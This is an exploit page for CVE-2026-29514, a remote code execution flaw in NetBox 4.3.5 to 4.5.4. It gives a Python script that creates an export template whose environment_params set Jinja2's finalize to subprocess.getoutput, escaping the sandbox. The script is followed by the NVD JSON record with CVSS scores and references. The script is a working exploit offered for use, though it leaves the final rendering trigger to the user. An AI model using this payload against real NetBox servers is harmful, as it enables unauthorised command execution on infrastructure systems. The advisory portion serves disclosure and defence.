CVE-2026-29514

import requests import json # Exploit for CVE-2026-29514 # Target: NetBox 4.3.5 - 4.5.4 target = "http://your-netbox-instance" api_token = "YOUR_API_TOKEN" headers = { "Authorization": f"Token {api_token}", "Content-Type": "application/json", "Accept": "application/json" } # Malicious payload to bypass Jinja2 sandbox # Setting finalize to subprocess.getoutput allows command execution payload_data = { "name": "RCE_Exploit_Template", "content_type": "dcim.device", "template_code": "{{ 'whoami' }}", # The key is injecting a callable into finalize "environment_params": json.dumps({"finalize": "subprocess.getoutput"}) } try: # Step 1: Create the malicious export template response = requests.post( f"{target}/api/extras/export-templates/", headers=headers, json=payload_data ) if response.status_code == 201: print("[+] Malicious template created successfully.") template_id = response.json()['id'] print(f"[+] Template ID: {template_id}") # Step 2: Trigger rendering (This usually happens via export action) # Example: Exporting a device using this template # In a real attack, this would involve finding a valid device ID and triggering the export endpoint print("[+] Note: Manual trigger via the UI or specific export API endpoint required to execute code.") else: print(f"[-] Failed to create template: {response.text}") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-29514", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:22.880", "lastModified": "2026-05-05T19:47:31.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NetBox versions 4.3.5 through 4.5.4 contain a remote code execution vulnerability in the RenderTemplateMixin.get_environment_params() method that allows authenticated users with exporttemplate or configtemplate permissions to execute arbitrary code by specifying malicious Python callables in the environment_params field. Attackers can bypass Jinja2 SandboxedEnvironment protections by setting the finalize parameter to any importable Python callable such as subprocess.getoutput, which is invoked on every rendered expression outside the sandbox's call interception mechanism, achieving remote code execution as the NetBox service user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-183"}]}], "references": [{"url": "https://chocapikk.com/posts/2026/netbox-export-template-rce/", "source": "[email protected]"}, {"url": "https://github.com/netbox-community/netbox/issues/22079", "source": "[email protected]"}, {"url": "https://github.com/netbox-community/netbox/pull/22078", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/netbox-rce-via-rendertemplatemixin", "source": "[email protected]"}]}}